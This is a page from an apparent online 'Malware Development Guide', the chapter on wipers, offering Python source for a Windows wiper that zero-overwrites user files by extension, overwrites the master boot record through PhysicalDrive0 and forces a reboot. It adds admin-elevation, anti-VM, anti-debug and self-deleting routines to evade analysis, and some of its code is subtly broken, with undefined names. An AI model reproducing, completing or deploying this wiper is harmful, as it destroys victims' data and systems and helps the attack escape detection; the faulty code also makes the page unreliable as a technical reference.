👾
Malware Development Guide
  • 🚀Introduction
  • 🐤Baby Steps
    • 📔Pre-requisite Knowledge
    • What is Malware?
    • Programming Guide
    • Vulnerability Analysis
  • 👾Basic Malware
    • Fork Bombs
    • Logical Bombs
    • Zip Bombs
    • Keyloggers
    • Wipers
    • ScreenJackers
    • Prependers and Postpenders
    • What's Next?
  • 💀Intermediate Malware
    • Browser Extensions
    • Worms
    • RATs
  • ☠️Advanced Malware
    • Botnets w/ C2 Servers
    • Rootkits and Bootkits
    • Polymorphic Malware
  • Appendix
    • Pivoting
      • Windows: Effing Drivers
      • Windows: Abusing LSASS
    • Elementary Concepts and Stuff
      • Memory Representation
      • Expressions
    • Being Stealthy
      • UAC Evasion
      • OPSEC
      • Code Obfuscation
      • Signing Code and Binary Properties
      • Punycodes
    • Backdoors
    • Windows Process Injection
    • SIM Swapping
    • Quishing
    • RunPE
    • Malware Packers
    • Learning Resources
  • Updates n Stuff
  • Scratchpad
Powered by GitBook
On this page
  1. Basic Malware

Wipers

PreviousKeyloggersNextScreenJackers

Last updated 2 years ago

A wiper is a class of intended to (wipe, hence the name) the of the computer it infects, maliciously deleting data and programs.

Simply put, a wiper just straight up removes EVERYTHING on a system, thus "disabling" the system. I found awesome article by @ that I'll be using as my main reference for this. This malware works in 4 primary stages:

  1. Destroy files content

  2. Destroy MBR

  3. Remove self

  4. Shut it down!

Let's look at a simple python wiper. Assuming that you got a rootkit to pack with this sucker, here's a simple program to wipe all things off of a windows system:

import os 
import subprocess
import ctypes
from ctypes import wintypes
import win32api


startupinfo = subprocess.STARTUPINFO() #type: ignore 
drives = win32api.GetLogicalDriveStrings()
kernel32 = ctypes.WinDLL('kernel32')


def OverWriteMBR(): 
    hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0) # Create a handle to our Physical Drive
    Kernel32.WriteFile(hDevice, Data, None) # Overwrite the MBR! (Never run this on your main machine!)
    Kernel32.CloseHandle(hDevice) # Close the handle to our Physical Drive!
    
def SetFiles():
    ext = [
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
           ".gif", ".txt", ".jar", ".sql", ".bundle",
           ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] # files to seek out and overwrite
    for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"): 
        for f in files:
            path = os.path.abspath(os.path.join(dirpath, f))
            if f.endswith(tuple(ext)): 
                with open(f, "rb") as files:
                    data = files.read()
                    files.close()
                    with open(f, "wb") as files:
                        data.write(b'\x00') # Overwrites multiple files with zero bytes (hex 00)
                        data.close()                             


def SysDown():
    # InitiateSystemShutdown()  
    os.system("shutdown -t 0 -r -f ") 

def main():
        global application_path 
        if getattr(sys, 'frozen', False):
            application_path = sys.executable
        else:
            application_path = os.path.dirname(os.path.abspath(__file__))

            SetFiles()
            OverWriteMBR()
if __name__ == "__main__":
    main()
    SysDown()

For example, you can add a checking mechanism that checks if the program is being run with elevated privileges:

def IsAdmin():
    """ it checks if it has Administrator privileges, if it doesn't it runs itself using the ShellExecute trick and exits immediately
        if it does, it performs the task at hand. """
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

Maybe some function to run the thing as admin:

def RunAsAdmin():
    ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(
        None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, sys.exit())

Some anti-debug/anti-vm magic never goes wrong:

def AntiVm():
      Process = ["vmsrvc.exe" , "vmusrvc.exe", "vboxtray.exe", "vmtoolsd.exe", "df5serv.exe", "vboxservice.exe"]
      for process in psutil.process_iter():
         for i in Process:
            if i in process.name().lower():
                return CommitSuicide()

def AntiDebug():
    isDebuggerPresent = windll.kernel32.IsDebuggerPresent()
    if (isDebuggerPresent):
        return CommitSuicide() 
        
def CommitSuicide():
    file_path = os.path.abspath(__file__) 
    os.remove(file_path)
    folder_path = os.path.dirname(file_path) 
    os.system("cipher /W:%s" % folder_path) # At the end of the script, the file is deleted & over-written

You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to make one such and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~

References

Simple as that! Run this as admin and it'll remove everything including the MBR. Neat right? Well, it's not very effective, but you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @ 's skywiper repo...)

👾
malware
erase
hard drive
this
0xf00I
0xf00I
https://github.com/golang/go/wiki/WindowsDLLs
https://pkg.go.dev/syscall#pkg-index
https://anubissec.github.io/How-To-Call-Windows-APIs-In-Golang/#
https://justen.codes/breaking-all-the-rules-using-go-to-call-windows-api-2cbfd8c79724
https://www.thesubtlety.com/post/getting-started-golang-windows-apis/
https://0x00sec.org/t/python-and-malware-writing-a-simple-wiper-malware/31652
https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list